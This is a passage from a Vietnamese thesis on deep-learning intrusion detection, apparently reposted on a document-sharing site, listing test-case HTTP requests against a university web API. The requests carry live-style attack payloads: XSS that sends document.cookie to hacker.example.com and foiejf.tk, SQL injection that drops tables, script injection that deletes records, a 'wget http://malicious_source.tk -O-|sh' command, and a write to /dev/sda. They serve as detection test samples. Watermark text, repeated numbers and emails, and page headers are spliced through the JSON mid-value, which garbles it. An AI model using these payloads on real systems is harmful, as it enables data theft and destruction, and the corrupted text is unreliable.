77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập F%2Ffoiejf.tk%3Fa%3D%24%7Bdocument.cookie%7D%27% 29%3C%2FscrIPT%3E", "adapter": "2" }, "body": {} 10 11 } Testcase 2: Về công dạng SQL-injection { "method": "GET", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/1/30", "query": { "maCha": "1$@#; DROP+TABLE FW_CAN_BO;", "adapter": "1%24%40%23%3B%20DROP%2BTABLE%20FW_CAN_BO%3B" }, "body": {} } Testcase 3: Về công dạng XSS 10 11 12 13 14 { "method": "GET", "originalUrl": "/api/cong-trinh-khoa-hoc/user/page/1/100", "query": { "filter": { "namBd": "", "namKt": "4096797311989091sessionid%3D12312312%26 +username%3D%3Cscript%3Edocument.location%3D%27 http%3A%2F%2Fhacker+.example.com%2Fcgi-bin%2F cookiesteal.cgi%3F%27%2B+document.cookie %3C%2Fscript%3E", "loaiCongTrinh": "4096797311989091sessionid%3D12312312%26 +username%3D%3Cscript%3Edocument.location%3D%27 http%3A%2F%2Fhacker+.example.com%2Fcgi-bin%2F cookiesteal.cgi%3F%27%2B+document.cookie Trang 77 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập %3C%2Fscript%3E", "donVi": "" 15 16 } 17 }, "body": {} 18 19 20 } Testcase 4: Về công dạng XSS Function injection { "method": "GET", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc/page/1/50", "query": { "condition": "%%3Cscript%3Eeval%28function%20%28%29%20%7B app.model.canBo.delete%28%7B%7D%29%29%3B%7D %3C%2Fscript%3E%%%%%%%", "isStandard": "true", "filter": { "maDonVi": "", "fromYear": "", "toYear": "Wed Dec 01 2021 00:00:00 GMT+0700", "loaiCt": "" } }, "body": {} 10 11 12 13 14 15 16 17 } Testcase 5: Về công dạng OS-command { "method": "GET", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc/page/1/50", "query": { "condition": "", "isStandard": "true", "filter": { "maDonVi": "", "fromYear": "", Trang 78 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "toYear": "Wed Dec 01 2021 00:00:00 GMT+0700", "loaiCt": "%3C%21 %23exec%20cmd%3D%5C%22wget%20 http%3A%2F%2Fmalicious_source.tk%20-O-%7C sh%22%20 %3E" 10 11 12 13 } 14 }, "body": {} 15 16 17 } Testcase 6: Về công dạng SQL injection { "method": "POST", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "item": { "tieuDe": "Ky ket thoa thuan hop tac voi Cong ty ABC", "diaDiem": ";DRoP table table_privileges", "thoiGian": "seLeCt * FroM TCHC_CAN_BO where first_name LIKE ’%" } } 10 11 12 } Testcase 7: Về công dạng OS-command 10 { "method": "POST", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "item": { "tieuDe": "Ky ket thoa thuan hop tac voi Cong ty ABC", "diaDiem": "%3C%21 %23exec%20cmd%3D%5C%22command %20%3E%2Fdev%2Fsda%22%20 %3E", "thoiGian": "seLeCt * FroM TCHC_CAN_BO where first_name LIKE ’%" Trang 79 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập } 11 } 12 13 } Testcase 8: Về công dạng SQL-injection { "method": "PUT", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "id": "307", "changes": { "tenDayDu": "{\"vi\":\"Cong ty A\",\"en\":\"A Corporation\"}", "tenVietTat": "A Corp", "namThanhLap": "2002", "phone": "0123456789", "email": "info@acorp.com.vn", "website": "", "capDo": "1", "diaChi": "{\"vi\":\"100 Tran Van A ,P.14, Q.10, TP.HCM\",\"en\":\"\"}", "theManh": "{\"vi\":\"\",\"en\":\"\"}", "moTa": "{\"vi\":\"\",\"en\":\"\"}", "kichHoat": "1", "doiTac": "1", "linhVucKinhDoanh": "", "quocGia": "VN", "ownerEmail": "329 Or 1=1; drop tablE DN_ky_ket", "loaiDoanhNghiep": "empty" } } 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 } Testcase 9: Về công dạng SQL-injection { "method": "PUT", "originalUrl": "/api/carousel", Trang 80 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "query": {}, "body": { "id": "329 Or 1=1; drop tablE DN_ky_ket", "changes": { "title": "Anh banner trang chu", "height": "329 Or 1=1; drop tablE DN_ky_ket", "single": "1%24%40%23%3B%20DROP%2BTABLE%20FW_CAN_BO%3B", "active": "1" } } 10 11 12 13 14 } Testcase 10: Về công dạng SQL-injection { "method": "DELETE", "originalUrl": "/api/doi-ngoai/doi-tac-hoc-thuat", "query": {}, "body": { "id": "%2527%253B%20DROP%20TABLE%20all_tables %253BSELECT%20%2A%20FROM%20FW_USER%20 WHERE%20role%20LIKE%20admin%3B" } 10 } Trang 81 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn

Ngày đăng: 21/08/2023, 02:02

Xem thêm:

Tài liệu cùng người dùng

Tài liệu liên quan